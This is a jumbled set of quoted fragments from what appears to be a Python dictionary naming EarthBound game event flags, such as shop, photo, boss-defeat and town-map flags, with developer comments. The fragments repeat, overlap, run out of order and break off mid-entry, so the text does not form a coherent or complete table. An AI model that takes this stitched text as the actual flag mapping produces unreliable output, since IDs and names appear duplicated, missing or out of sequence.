'GOT_KING_BANANA', #", "arriving in Threed, cleared when defeating Belch) 762: 'DUNGEON_MAN_GOODBYE_EXIT_SIGN', 763: 'PICKY_KNOCKING_ON_DOOR', 764: 'READY_TO_LEARN_TELEPORT',", "642: 'HIDE_THREED_TO_TWOSON_TOWN_MAP', 643: 'READY_TO_LOOK_AT_PHOTO_ALBUM', 644: 'GOT_SATURN_RIBBON', 645: 'ESCARGO_EXPRESS_PICK_UP', 646: 'FOR_SALE_SIGN_CUSTOMER_2', 647: 'FOR_SALE_SIGN_CUSTOMER_3', 648:", "132: 'QUEST_TO_ZEXONYTE', 133: 'PHASE_DISTORTER_V2_OPEN', 134: 'DELIVERED_ZEXONYTE', 135: 'TALKED_TO_BLACK_SESAME_SEED', 136: 'TRAFFIC_JAM_CLEARED', 137: 'GAVE_FOOD_TO_MONTAGUE', 138:", "flag for some Hotel Attendant?) 590: 'HAPPY_THREED_PEOPLE', 591: 'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 592:", "'MONKEY_CAVE_PENCIL_ERASED', 517: 'NESS_ROOM_LIGHTS_ON', 518: 'GUARDIAN_MOLE_TEXT_1', 519: 'GUARDIAN_MOLE_TEXT_2', 520: 'GUARDIAN_MOLE_TEXT_3', 521: 'GUARDIAN_MOLE_TEXT_4', # 522", "'CHAOS_THEATER_BACKSTAGE_OPEN', 116: 'ORANGE_KID_ALT_TEXT', 117: 'INVESTED_IN_ORANGE_KID', 118: 'PAULAS_DAD_OUTSIDE', 119: 'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER', 120: 'SHOPPED_AT_FOOD_STAND', 121: 'DID_NOT_PAY_FOOD_STAND',", "'PHOTO_POOS_PALACE_OUTSIDE_AVAILABLE', 500: 'PHOTO_STONEHENGE_AVAILABLE', 501: 'PHOTO_SUMMERS_HOTEL_AVAILABLE', 502: 'PHOTO_FOURSIDE_RESTAURANT_AVAILABLE', 503: 'PHOTO_SUMMERS_BEACH_AVAILABLE', 504: 'PHOTO_TOTO_AVAILABLE', 505: 'PHOTO_SCARABA_BAZAAR_AVAILABLE',", "749: 'NESS_WEARING_PAJAMAS', 750: 'LEFT_HOME_AT_LEAST_ONCE', 751: 'CHAOS_THEATER_AUDIENCE_ABSENT', 752: 'HINT_GUY_ABSENT', 753: 'NESS_HOUSE_PHONE_RINGING', 754: 'PREVENT_TELEPORT', 755:", "518: 'GUARDIAN_MOLE_TEXT_1', 519: 'GUARDIAN_MOLE_TEXT_2', 520: 'GUARDIAN_MOLE_TEXT_3', 521: 'GUARDIAN_MOLE_TEXT_4', # 522 (Multipurpose?) # 523", "767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS', 768: 'PAID_MUSEUM_ENTRANCE_FEE', # 769 (Checked when you talk to Tracy after", "'SENTRY_ROBOT_2_DEFEATED', 359: 'SENTRY_ROBOT_3_DEFEATED', 360: 'SENTRY_ROBOT_4_DEFEATED', 361: 'SENTRY_ROBOT_5_DEFEATED', 362: 'SENTRY_ROBOT_6_DEFEATED', 363: 'SHARK_OUTSIDE_ARCADE_1_DEFEATED', 364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED',", "'PAULA_TELEPATHY_DREAM_1', 635: 'PAULA_TELEPATHY_DREAM_2', 636: 'PAULA_TELEPATHY_DREAM_JEFF', 637: 'POO_AT_HIS_PALACE', 638: 'PAULA_AT_HER_ROOM', 639: 'TALKED_TO_MAGICANT_EVERDRED', 640: 'HIDE_FOURSIDE_TO_DESERT_TOWN_MAP',", "there's no NPC attached to the script for this battle 387: 'MOONSIDE_CAFE_ROBO_PUMP_DEFEATED', 388:", "to Montague... AND STONEHENGE??) # 56 (Unknown) 57: 'FOURSIDE_DEPT_BLACKOUT', 58: 'FOURSIDE_SEWERS_OPEN', 59: 'ELECTRA_OUTSIDE_BUILDING',", "100: 'KING_WONT_JOIN', 101: 'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI', 102: 'TALKED_TO_SHYGUY_ABOUT_SHYNESS_BOOK', 103: 'LIBRARY_BATHROOM_MAN', # Referenced in unused text", "'MOONSIDE_COUNTDOWN_GUY_1', 167: 'MOONSIDE_COUNTDOWN_GUY_2', 168: 'MOONSIDE_COUNTDOWN_GUY_3', 169: 'PHASE_DISTORTER_V2_BEING_FINISHED', # 170 (???) 171: 'GOT_SATURN_LIFENOODLES', 172:", "135: 'TALKED_TO_BLACK_SESAME_SEED', 136: 'TRAFFIC_JAM_CLEARED', 137: 'GAVE_FOOD_TO_MONTAGUE', 138: 'TALKED_TO_WHITE_SESAME_SEED', 139: 'DEPT_STORE_SPOOK_DEFEATED', # TODO: Confirm", "73: 'GIYGAS_DEFEATED', 74: 'NESS_NIGHTMARE_DEFEATED', 75: 'MANI_MANI_DEFEATED', 76: 'GOT_TRACY_COOKIE', 77: 'GOT_MR_BASEBALL_CAP', 78: 'GOT_ENTERTAINERS_TRAVEL_CHARM', 79:", "(Five moles defeated? How does this differ from 72?) # 283 (???) 284:", "397: 'GUARDIAN_HIEROGLYPH_8_DEFEATED', 398: 'GUARDIAN_HIEROGLYPH_9_DEFEATED', 399: 'GUARDIAN_HIEROGLYPH_10_DEFEATED', 400: 'GUARDIAN_HIEROGLYPH_11_DEFEATED', 401: 'GUARDIAN_HIEROGLYPH_12_DEFEATED', 402: 'GUARDIAN_HIEROGLYPH_13_DEFEATED', 403:", "'GEORGE_HAS_DIAMOND', 758: 'GOING_TO_MAGICANT_MUSIC', 759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA', # Visibility flag for NPCs #851 and #852", "'PAID_MUSEUM_ENTRANCE_FEE', # 769 (Checked when you talk to Tracy after defeating Giygas, but", "'TEMP_4', 5: 'TEMP_5', 6: 'TEMP_6', 7: 'TEMP_7', 8: 'TEMP_8', 9: 'TEMP_9', 10: 'TEMP_10',", "(Also related to Montague... AND STONEHENGE??) # 56 (Unknown) 57: 'FOURSIDE_DEPT_BLACKOUT', 58: 'FOURSIDE_SEWERS_OPEN',", "'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS', 766: 'EXIT_MOUSE_DISAGREEABLE', 767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS', 768: 'PAID_MUSEUM_ENTRANCE_FEE', # 769 (Checked when you talk", "527: 'NEAR_RED_GEYSER', 528: 'NEAR_BLUE_GEYSER_2', # 529 (???) 530: 'TRACY_NOT_AT_HER_ROOM', 531: 'TRACY_DOWNSTAIRS', 532: 'NESS_ROOM_METEORITE_FALLING_MUSIC',", "118: 'PAULAS_DAD_OUTSIDE', 119: 'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER', 120: 'SHOPPED_AT_FOOD_STAND', 121: 'DID_NOT_PAY_FOOD_STAND', 122: 'CARPAINTER_HAS_KEY', 123: 'BLUE_COW_ALT_TEXT', 124:", "'MANI_MANI_DEFEATED', 76: 'GOT_TRACY_COOKIE', 77: 'GOT_MR_BASEBALL_CAP', 78: 'GOT_ENTERTAINERS_TRAVEL_CHARM', 79: 'GOT_METEORITE_PIECE', 80: 'GOT_KEY_TO_SHACK', 81: 'HAS_BICYCLE',", "# TODO: Confirm 140: 'QUEST_TO_VENUS_AUTOGRAPH', 141: 'GOT_TROUT_YOGURT', 142: 'CAN_ACCESS_48TH_MONOTILI_FLOOR', 143: 'FOURSIDE_FREE_FROM_MONOTOLI', # 144", "697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED', 698: 'GOT_PHOTO_NESS_HOUSE', 699: 'GOT_PHOTO_SCAM_HOUSE', 700: 'GOT_PHOTO_CYCLE_SHOP', 701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY', 702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN', 703:", "# 233 (I hate multipurpose flags) 234: 'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN', 235: 'SHOP_BURGLIN_PARK_JAMAICAN', 236: 'SHOP_BURGLIN_PARK_BAKERY', 237:", "Set when you receive the Pencil Eraser. Cleared when you defeat Mr. Carpainter)", "236: 'SHOP_BURGLIN_PARK_BAKERY', 237: 'SHOP_BURGLIN_PARK_CONDIMENTS', 238: 'SHOP_BURGLIN_PARK_BANANA_LADY', 239: 'SHOP_HH_DRUGSTORE_CONSUMABLES', 240: 'SHOP_HH_DRUGSTORE_EQUIPMENT', 241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242:", "'MONKEY_CAVE_RULER', 463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY', 464: 'GOT_KING_BANANA', # 465 (???) 466: 'PICKY_SLEEPING_AT_METEORITE', # 467 (Unknown.", "# 381 (???) 382: 'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT', 383: 'JUST_RESTED', 384: 'GOT_ALL_MELODIES', 385: 'GOT_CONTACT_LENS', 386: 'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED',", "830: 'PRESENT_TONY_COOKIE_2', 831: 'PRESENT_TONY_COOKIE_3', 832: 'PRESENT_TONY_COOKIE_4', 833: 'PRESENT_TONY_COOKIE_5', 834: 'PRESENT_TONY_COOKIE_6', 835: 'PRESENT_TONY_COOKIE_7' }", "only set if you're near (0x02A0, 0x0D70) in a radius of 16 pixels)", "# Unused, there's no NPC attached to the script for this battle 387:", "538 (???) 539: 'GIVEN_PLAYERS_NAME', # 540 (???) 541: 'OPENED_THREED_CEMETERY_UNDREGROUND_DOOR', 542: 'SAILING_OR_SUBMARINE_MUSIC', 543: 'SAILING_POST_KRAKEN_MUSIC',", "'GOT_MELODY_LILLIPUT_STEPS', 184: 'GOT_MELODY_RAINY_CIRCLE', 185: 'GOT_MELODY_MILKY_WELL', 186: 'GOT_MELODY_MAGNET_HILL', 187: 'GOT_MELODY_PINK_CLOUD', 188: 'GOT_MELODY_LUMINE_HALL', 189: 'GOT_MELODY_FIRE_SPRING',", "'HIDE_SCARABA_HOSPITAL_TOWN_MAP', 581: 'HIDE_SCARABA_SHOP_TOWN_MAP', 582: 'HIDE_SUMMERS_HOTEL_TOWN_MAP', 583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP', 584: 'HIDE_SUMMERS_SHOP_TOWN_MAP', 585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP', 586: 'HIDE_TOTO_SHOP_TOWN_MAP',", "# Referenced in unused text 104: 'POKEY_PUNISHED', 105: 'PATH_TO_TWOSON_OPEN', # 106 (???) 107:", "255: 'SHOP_FOURSIDE_BAKERY', 256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT', 257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES', 258: 'SHOP_FOURSIDE_DEPT_BAKERY', 259: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS', 260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS', 261:", "'SHOP_DALAAM_RESTAURANT', 271: 'SHOP_SCARABA_HASSANS_SHOP', 272: 'DIAMOND_TO_BE_DELIVERED', 273: 'MU_TRAINING_COMPLETE', 274: 'DUNGEON_MAN_AT_PALM_TREES', 275: 'LEARNED_TELEPORT', 276: 'MASTER_BARF_DEFEATED',", "486: 'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE', 487: 'PHOTO_THREED_CEMETERY_AVAILABLE', 488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE', 489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE', 490: 'PHOTO_CIRCUS_TENT_AVAILABLE', 491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE', 492:", "193: 'CONQUERED_SANCTUARY_3', 194: 'CONQUERED_SANCTUARY_5', 195: 'CONQUERED_SANCTUARY_6', 196: 'CONQUERED_SANCTUARY_7', 197: 'CONQUERED_SANCTUARY_8', # 198 (Unknown.", "402: 'GUARDIAN_HIEROGLYPH_13_DEFEATED', 403: 'GUARDIAN_HIEROGLYPH_14_DEFEATED', 404: 'GUARDIAN_HIEROGLYPH_15_DEFEATED', 405: 'GUARDIAN_HIEROGLYPH_16_DEFEATED', 406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED', 407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED', 408:", "337: 'CALLED_STOIC_CLUB', 338: 'NEAR_WINTERS_ROPE', 339: 'APPLE_KID_NOT_AT_HIS_HOUSE', # 340 (???) 341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER', 342: 'PYRAMID_OPEN',", "'SHOP_MAGIC_CAKE_LADY', 270: 'SHOP_DALAAM_RESTAURANT', 271: 'SHOP_SCARABA_HASSANS_SHOP', 272: 'DIAMOND_TO_BE_DELIVERED', 273: 'MU_TRAINING_COMPLETE', 274: 'DUNGEON_MAN_AT_PALM_TREES', 275: 'LEARNED_TELEPORT',", "Giygas, but never set) 770: 'LAST_ESCARGO_EXPRESS_CALL', # 771 (???) 772: 'LAST_DAD_CALL', 773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT',", "'FLYING_MAN_4_DEAD', 208: 'FLYING_MAN_5_DEAD', 209: 'VISITED_ONETT', 210: 'VISITED_TWOSON', 211: 'VISITED_THREED', 212: 'VISITED_WINTERS', 213: 'VISITED_SATURN_VALLEY',", "615: 'TELEPORT_MONKEY_NEAR_DESERT_ROAD', 616: 'TENDAKRAUT_STOLEN', 617: 'MAGIC_CAKE_LADY_AT_BEACH', 618: 'GOT_ERASER_ERASER', # 619 (Unkonwn. Related to", "'GOT_PHOTO_SUMMERS_HOTEL', 721: 'GOT_PHOTO_FOURSIDE_RESTAURANT', 722: 'GOT_PHOTO_SUMMERS_BEACH', 723: 'GOT_PHOTO_TOTO', 724: 'GOT_PHOTO_SCARABA_BAZAAR', 725: 'GOT_PHOTO_PYRAMID', 726: 'GOT_PHOTO_SCARABA_OASIS',", "535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC', 536: 'RUNAWAY_FIVE_FREE_MUSIC', 537: 'TESSIE_MUSIC', # 538 (???) 539: 'GIVEN_PLAYERS_NAME', # 540", "# 305 (???) 306: 'LIER_INSIDE_CAVE_3', 307: 'LIER_INSIDE_CAVE_4', 308: 'LIER_BY_MANI_MANI', 309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED', 310: 'POKEY_WAITING_AT_COUCH',", "CONFIRM 593: 'POO_TELEPORTING_TO_SUMMERS', 594: 'BLOND_GUY_IN_FOURSIDE', # TODO: CONFIRM 595: 'STAR_MASTER_NEXT_TO_MU', # 596 (???)", "355: 'HH_HQ_CULTIST_5_DEFEATED', 356: 'HH_HQ_CULTIST_6_DEFEATED', 357: 'SENTRY_ROBOT_1_DEFEATED', 358: 'SENTRY_ROBOT_2_DEFEATED', 359: 'SENTRY_ROBOT_3_DEFEATED', 360: 'SENTRY_ROBOT_4_DEFEATED', 361:", "(Multipurpose?) 524: 'YOUR_SANCTUARY_MUSIC', # 525 (???) 526: 'NEAR_BLUE_GEYSER_1', 527: 'NEAR_RED_GEYSER', 528: 'NEAR_BLUE_GEYSER_2', #", "723: 'GOT_PHOTO_TOTO', 724: 'GOT_PHOTO_SCARABA_BAZAAR', 725: 'GOT_PHOTO_PYRAMID', 726: 'GOT_PHOTO_SCARABA_OASIS', 727: 'GOT_PHOTO_DEEP_DARKNESS', 728: 'GOT_PHOTO_TENDA_VILLAGE', 729:", "'CONQUERED_SANCTUARY_6', 196: 'CONQUERED_SANCTUARY_7', 197: 'CONQUERED_SANCTUARY_8', # 198 (Unknown. Set when Paula joins) 199:", "'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT', 669: 'FLY_HONEY_TRASH_CAN_VISIBLE', 670: 'GOT_FOR_SALE_SIGN', # 671 (???) 672: 'POKEY_FLIES_AWAY_BY_HELICOPTER', 673: 'HIDE_TWOSON_BURGLIN_BAKERY_TOWN_MAP', 674:", "207: 'FLYING_MAN_4_DEAD', 208: 'FLYING_MAN_5_DEAD', 209: 'VISITED_ONETT', 210: 'VISITED_TWOSON', 211: 'VISITED_THREED', 212: 'VISITED_WINTERS', 213:", "in the Monotoli Building? 626: 'MEN_ABOUT_TO_ENTER_CIRCUS_TENT', 627: 'TRACY_HAS_SOUND_STONE', 628: 'PRESENTS_AT_SATURN_VALLEY', 629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT', 630:", "some Hotel Attendant?) 590: 'HAPPY_THREED_PEOPLE', 591: 'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 592: 'MONKEY_OUTSIDE_JACKIES_CAFE', #", "(??? Something about Runaway Five Tour Bus???) 748: 'SKY_RUNNER_AT_WINTERS_LAB', 749: 'NESS_WEARING_PAJAMAS', 750: 'LEFT_HOME_AT_LEAST_ONCE',", "55 (Also related to Montague... AND STONEHENGE??) # 56 (Unknown) 57: 'FOURSIDE_DEPT_BLACKOUT', 58:", "'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT', 328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1', 329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT', 330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT', 331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2', 332: 'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT', 333: 'DESERT_MINE_BULLDOZER_MOVED',", "657: 'BOUGHT_OR_SOLD_AT_SHOP', 658: 'BOUGHT_WEAPON', 659: 'MOONSIDE_SWITCH_YES_NO', 660: 'ALT_NO_TALK_TEXT', 661: 'CHOSEN_FOUR_SOULS_RETURNING_MUSIC', 662: 'DUNGEON_MAN_DESERT_MUSIC', 663:", "322: 'PAULAS_DAD_NOTICED_SHES_NOT_HOME', 323: 'GOT_PAK_OF_BUBBLE_GUM', 324: 'SHOP_RED_SNAKE', 325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT', 326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER', 327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT', 328:", "460: 'MONKEY_CAVE_HAMBURGER_3', 461: 'MONKEY_CAVE_FRESH_EGG', 462: 'MONKEY_CAVE_RULER', 463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY', 464: 'GOT_KING_BANANA', # 465 (???)", "186: 'GOT_MELODY_MAGNET_HILL', 187: 'GOT_MELODY_PINK_CLOUD', 188: 'GOT_MELODY_LUMINE_HALL', 189: 'GOT_MELODY_FIRE_SPRING', 190: 'CONQUERED_SANCTUARY_1', 191: 'CONQUERED_SANCTUARY_2', 192:", "'READ_HIEROGLYPHS', 149: 'POO_STARTS_HIS_JOURNEY', # 150 (Related to Poo's journey) 151: 'QUEST_TO_SUBMARINE', 152: 'PYRAMID_DANCE_IN_PROGRESS',", "197: 'CONQUERED_SANCTUARY_8', # 198 (Unknown. Set when Paula joins) 199: 'GOT_DAD_PHONE', 200: 'GOT_MOM_PHONE',", "'GOT_KING_BANANA', # 465 (???) 466: 'PICKY_SLEEPING_AT_METEORITE', # 467 (Unknown. Related to Ness's house", "flags) # 232 (I hate multipurpose flags) # 233 (I hate multipurpose flags)", "set) 770: 'LAST_ESCARGO_EXPRESS_CALL', # 771 (???) 772: 'LAST_DAD_CALL', 773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT', # Visibility flags", "94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT', 95: 'DAD_CALLING_HOME', 96: 'POKEY_WAITING_MOM_GOODBYE', 97: 'NESS_HOUSE_POKEY_MUSIC', 98: 'ANSWERED_DADS_CALL', 99: 'BOUGHT_SCAM_HOUSE', 100:", "(Can't get calls from Dad?) 776: 'PAULA_AT_MONOTOLI_BUILDING', 777: 'GOT_SYNESS_BOOK_BACK_FROM_TENDA', 778: 'EXIT_MOUSE_ASLEEP', # 779", "747 (??? Something about Runaway Five Tour Bus???) 748: 'SKY_RUNNER_AT_WINTERS_LAB', 749: 'NESS_WEARING_PAJAMAS', 750:", "303: 'BUZZ_BUZZ_DYING_ON_FLOOR', 304: 'KING_AWAKE_AT_HOME', # 305 (???) 306: 'LIER_INSIDE_CAVE_3', 307: 'LIER_INSIDE_CAVE_4', 308: 'LIER_BY_MANI_MANI',", "'BUBBLE_MONKEY_JOINS', 335: 'TONY_AT_BOARDING_SCHOOL_GATE', 336: 'GOT_KEY_TO_DUNGEON_MAN', 337: 'CALLED_STOIC_CLUB', 338: 'NEAR_WINTERS_ROPE', 339: 'APPLE_KID_NOT_AT_HIS_HOUSE', # 340", "'HIDE_FOURSIDE_DEPT_STORE_TOWN_MAP', 577: 'HIDE_FOURSIDE_BAKERY_TOWN_MAP', 578: 'HIDE_FOURSIDE_HOTEL_TOWN_MAP', 579: 'HIDE_SCARABA_HOTEL_TOWN_MAP', 580: 'HIDE_SCARABA_HOSPITAL_TOWN_MAP', 581: 'HIDE_SCARABA_SHOP_TOWN_MAP', 582: 'HIDE_SUMMERS_HOTEL_TOWN_MAP',", "655: 'SKY_RUNNER_MUSIC', 656: 'ALT_BUY_SOUND_EFFECT', 657: 'BOUGHT_OR_SOLD_AT_SHOP', 658: 'BOUGHT_WEAPON', 659: 'MOONSIDE_SWITCH_YES_NO', 660: 'ALT_NO_TALK_TEXT', 661:", "to Everdred) 612: 'EVERDRED_NOT_AT_ROOF', 613: 'TELEPORT_MONKEY_NOT_AT_CAVE', 614: 'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE', 615: 'TELEPORT_MONKEY_NEAR_DESERT_ROAD', 616: 'TENDAKRAUT_STOLEN', 617:", "777: 'GOT_SYNESS_BOOK_BACK_FROM_TENDA', 778: 'EXIT_MOUSE_ASLEEP', # 779 (Related to PREVENT_TELEPORT?) # 780 (If set,", "'TEMP_3', 4: 'TEMP_4', 5: 'TEMP_5', 6: 'TEMP_6', 7: 'TEMP_7', 8: 'TEMP_8', 9: 'TEMP_9',", "'ONETT_DAYTIME', 423: 'UNDERWORLD_TALKING_ROCK_STOPPED_TALKING', 424: 'TENDA_SHOP_PLAIN_ROLL_1', 425: 'TENDA_SHOP_PLAIN_YOGURT', 426: 'TENDA_SHOP_PLAIN_ROLL_2', 427: 'TENDA_SHOP_SPICY_JERKY', 428: 'TENDA_SHOP_BAG_OF_DRAGONITE',", "259: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS', 260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS', 261: 'SHOP_FOURSIDE_DEPT_BURGER', 262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS', 263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER', 264: 'SHOP_FOURSIDE_PUNK_GUY', 265:", "multipurpose flags) # 232 (I hate multipurpose flags) # 233 (I hate multipurpose", "for shyness book\"? This flag is set even if you don't talk to", "'GHOSTS_BLOCKING_THREED', # 313 (Unknown. Something about the City Bus?) # 314 (Unknown. Something", "'MACH_PIZZA_ZOMBIE_PAPER_DELIVERY', 676: 'HIDE_THREED_BUS_STOP_1_TOWN_MAP', 677: 'HIDE_THREED_BUS_STOP_2_TOWN_MAP', 678: 'HIDE_FOURSIDE_BUS_STOP_TOWN_MAP', # 679 (Something about Venus show", "'GOT_MONEY_FROM_TWOSON_HOTEL_GUY_AT_TABLE', 739: 'PAULAS_DAD_RAN_IN_FRONT_OF_TWOSON_HOTEL', 740: 'PEOPLE_IN_THREED_ABSENT', 741: 'MONOTOLI_AT_48TH_FLOOR', 742: 'LARDNA_AT_HOME', 743: 'VISITED_HAPPY_HAPPY_VILLAGE', 744: 'TALKED_TO_CARPAINTER',", "'FOURSIDE_FREE_FROM_MONOTOLI', # 144 (Related to Bulldozer at Fourside Bridge?) 145: 'TALKED_TO_DYING_EVERDRED', 146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER',", "461: 'MONKEY_CAVE_FRESH_EGG', 462: 'MONKEY_CAVE_RULER', 463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY', 464: 'GOT_KING_BANANA', # 465 (???) 466: 'PICKY_SLEEPING_AT_METEORITE',", "'SHATTERED_MAN_2_DEFEATED', 603: 'MINI_BARF_DEFEATED', 604: 'GOT_KEY_TO_THE_LOCKER', 605: 'USED_KEY_TO_THE_LOCKER', 606: 'DUNGEON_MAN_OPEN', # 607 (Unknown. Related", "254: 'SHOP_DESERT_ARMS_DEALER', 255: 'SHOP_FOURSIDE_BAKERY', 256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT', 257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES', 258: 'SHOP_FOURSIDE_DEPT_BAKERY', 259: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS', 260:", "'LAST_MELODY_AT_PINK_CLOUD', 548: 'LAST_MELODY_AT_FIRE_SPRING', 549: 'QUEUE_OUTSIDE_CHAOS_THEATER', 550: 'GOT_SUPORMA', 551: 'GAVE_FOOD_TO_APPLE_KID', 552: 'GOT_ZOMBIE_PAPER', 553: 'GOT_BACKSTAGE_PASS',", "345 (Related to Lake Tess. This is only set if you're near (0x02A0,", "PREVENT_TELEPORT?) # 780 (If set, Maxwell doesn't actually save your game. WHAT?) 805:", "281: 'GUARDIAN_MOLE_5_DEFEATED', # 282 (Five moles defeated? How does this differ from 72?)", "304: 'KING_AWAKE_AT_HOME', # 305 (???) 306: 'LIER_INSIDE_CAVE_3', 307: 'LIER_INSIDE_CAVE_4', 308: 'LIER_BY_MANI_MANI', 309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED',", "(Unknown. Related to traffic jam?) # 371 (???) 372: 'PARTY_IS_ROBOTIFIED', # 373 (Unknown.", "# The first Hieroglyph Guardian doesn't reference this flag and never fights you", "'NEAR_RED_GEYSER', 528: 'NEAR_BLUE_GEYSER_2', # 529 (???) 530: 'TRACY_NOT_AT_HER_ROOM', 531: 'TRACY_DOWNSTAIRS', 532: 'NESS_ROOM_METEORITE_FALLING_MUSIC', 533:", "and #852 760: 'PHASE_DISTORTER_MUSIC', # 761 (Unknown. Set when arriving in Threed, cleared", "407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED', 408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED', 409: 'LETHAL_ASP_HIEROGLYPH_3_DEFEATED', 410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED', 411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED', 412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED', 413:", "City Bus?) 317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED', 318: 'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM', 319: 'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER', # 320 (???) # 321", "683: 'SHOW_THREED_HINT_TOWN_MAP', 684: 'SHOW_FOURSIDE_HINT_TOWN_MAP', 685: 'SHOW_SUMMERS_HINT_TOWN_MAP', 686: 'SHOW_SCARABA_HINT_TOWN_MAP', 687: 'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING', 688: 'HAS_CALLED_MOM', 689:", "198 (Unknown. Set when Paula joins) 199: 'GOT_DAD_PHONE', 200: 'GOT_MOM_PHONE', 201: 'GOT_ESCARGO_EXPRESS_PHONE', 202:", "544: 'WINTERS_MUSIC', 545: 'LAST_MELODY_AT_LILLIPUT_STEPS', 546: 'LAST_MELODY_AT_MILKY_WELL', 547: 'LAST_MELODY_AT_PINK_CLOUD', 548: 'LAST_MELODY_AT_FIRE_SPRING', 549: 'QUEUE_OUTSIDE_CHAOS_THEATER', 550:", "'HIDE_TWOSON_DEPT_STORE_TOWN_MAP', 566: 'HIDE_TWOSON_TO_ONETT_TOWN_MAP', 567: 'HIDE_TWOSON_BUS_STOP_TOWN_MAP', 568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP', 569: 'HIDE_TWOSON_TO_THREED_TOWN_MAP', 570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP', 571: 'HIDE_THREED_HOTEL_TOWN_MAP',", "'SHARK_AT_ARCADE_ABSENT', 366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT', 367: 'SLIMY_LITTLE_PILE_2_DEFEATED', 368: 'SLIMY_LITTLE_PILE_3_DEFEATED', 369: 'CAN_ENTER_BELCHS_FACTORY', # 370 (Unknown. Related", "'GOT_ESCARGO_EXPRESS_PHONE', 202: 'GOT_MACH_PIZZA_PHONE', 203: 'GOT_STOIC_CLUB_PHONE', 204: 'FLYING_MAN_1_DEAD', 205: 'FLYING_MAN_2_DEAD', 206: 'FLYING_MAN_3_DEAD', 207: 'FLYING_MAN_4_DEAD',", "# 227 (I hate multipurpose flags) # 228 (I hate multipurpose flags) #", "version uses the same flag IDs FLAG_NAMES = { 1: 'TEMP_1', 2: 'TEMP_2',", "to Stonehenge Base) 620: 'APPLE_MOUSE_AT_WINTERS_LAB', 621: 'MONKEYS_AT_WINTERS_LAB', 622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS', 623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED', 624: 'EVERDRED_AT_HIS_HOUSE',", "623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED', 624: 'EVERDRED_AT_HIS_HOUSE', # 625 (Something about \"Fancy Pokey\" in the Monotoli", "722: 'GOT_PHOTO_SUMMERS_BEACH', 723: 'GOT_PHOTO_TOTO', 724: 'GOT_PHOTO_SCARABA_BAZAAR', 725: 'GOT_PHOTO_PYRAMID', 726: 'GOT_PHOTO_SCARABA_OASIS', 727: 